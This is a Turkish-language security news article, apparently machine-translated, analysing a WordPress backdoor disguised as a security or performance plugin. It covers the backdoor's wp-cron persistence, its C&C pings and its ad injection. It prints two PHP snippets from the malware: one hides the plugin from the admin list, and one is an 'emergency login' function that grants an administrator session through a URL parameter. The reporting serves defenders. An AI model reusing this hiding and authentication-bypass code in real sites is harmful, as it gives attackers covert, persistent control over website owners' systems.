Meşru bir WordPress güvenlik eklentisi olarak maskelenen sofistike bir kötü amaçlı yazılım varyantı tanımlanmıştır ve saldırganlara tehlikeye atılan web sitelerine sürekli erişim sağlayabilmiştir.
Kötü amaçlı kod, dosya sisteminde ‘WP-ANDYMalwary-Bot.php’ veya ‘WP-Performance-booster.php’ gibi zararsız adlar altında görünür ve uzaktan kod yürütme, yönetici erişim hizmeti ve kötü niyetli kod enjeksiyonu dahil olmak üzere tehlikeli yetenekleri barındırırken bir meşruiyet cephesi oluşturur.
Bu aldatıcı kötü amaçlı yazılım, saldırganların arka kapı erişimini sürdürmesine, keyfi kodları uzaktan yürütmesine ve istenmeyen reklamlara hizmet etmekten sorumlu kötü niyetli JavaScript enjekte eden çeşitli işlevler içerir.
.png
)
Eklentinin tasarımı, saldırganlara enfekte olmuş siteler hakkında gerçek zamanlı bilgi sağlayan ve tehlikeye atılan platformlarda koordineli saldırıları sağlayan Ping Komut ve Kontrol (C&C) sunucularına mekanizmalar içerir.
WordFence araştırmacıları, 22 Ocak 2025’te rutin bir site temizliği sırasında kötü amaçlı yazılımları belirledi ve olağandışı sofistike olduğunu ve meşru eklenti mimarisini taklit etmek için dikkatli bir çabaya dikkat çekti.
Güvenlik ekibi daha sonra algılama imzaları geliştirdi ve 24 Ocak’a kadar premium müşterilere yayınladı ve ücretsiz sürüm kullanıcıları 23 Mayıs 2025’e kadar koruma alması planlandı.
Kötü amaçlı yazılımın sinsi doğası, belirgin bir şekilde kaldırıldıktan sonra bile web sitelerini yeniden canlandırma yeteneğinde yatmaktadır.
Bu kalıcılığı, silinirse kötü amaçlı eklentiyi otomatik olarak yeniden yükleyen WordPress wp-cron.php dosyasını değiştirerek elde eder.
Bu, tehdidi başarıyla kaldırdıklarına inanabilecek web sitesi yöneticileri için zorlu bir iyileştirme senaryosu oluşturur.
Bu tehdidi özellikle ilgili kılan şey, Kıbrıs’ta bulunan bir C&C sunucusu ile iletişim kurma yeteneğidir. Her dakika, kötü amaçlı yazılım, enfekte olmuş sitenin URL’sini ve bir zaman damgasını gönderir ve saldırganların uzlaşmış web sitelerinin güncellenmiş bir envanterini korumasını sağlar.
Sofistike kaçış teknikleri
Kötü amaçlı yazılım, en önemlisi, özel işlevler aracılığıyla kendisini WordPress kontrol panelinden saklayarak algılamayı önlemek için çeşitli yöntemler kullanır:-
// Function to hide plugin from list
function hide_plugin_from_list($plugins) {
if (is_admin() && isset($plugins[plugin_basename(__FILE__)])) {
unset($plugins[plugin_basename(__FILE__)]);
}
return $plugins;
}
add_filter('all_plugins', 'hide_plugin_from_list');Bu aldatma, yetkisiz erişimin nasıl kazanıldığına uzanır. Kötü amaçlı yazılım, önceden tanımlanmış bir şifre parametresi kullanarak normal kimlik doğrulamasını atlayan bir acil durum giriş işlevi uygular.
Tetiklendiğinde, bulduğu ilk yönetici hesabını kaçırarak otomatik olarak yönetici ayrıcalıkları verir:-
function emergency_login_all_admins() {
if (isset($_GET['emergency_login']) && $_GET['emergency_login'] === [REDACTED]) {
$admins = get_users(['role' => 'administrator']);
if (!empty($admins)) {
$admin = reset($admins);
wp_set_auth_cookie($admin->ID, true);
wp_redirect(admin_url());
exit;
}
}
}Bu ortaya çıkan tehdit, meşru görünen kod yapılarını kalıcı enfeksiyon mekanizmaları ve sofistike arka kapı yetenekleriyle birleştiren WordPress hedefli kötü amaçlı yazılımlarda bir evrimi temsil eder.
Malware Trends Report Based on 15000 SOC Teams Incidents, Q1 2025 out!-> Get Your Free Copy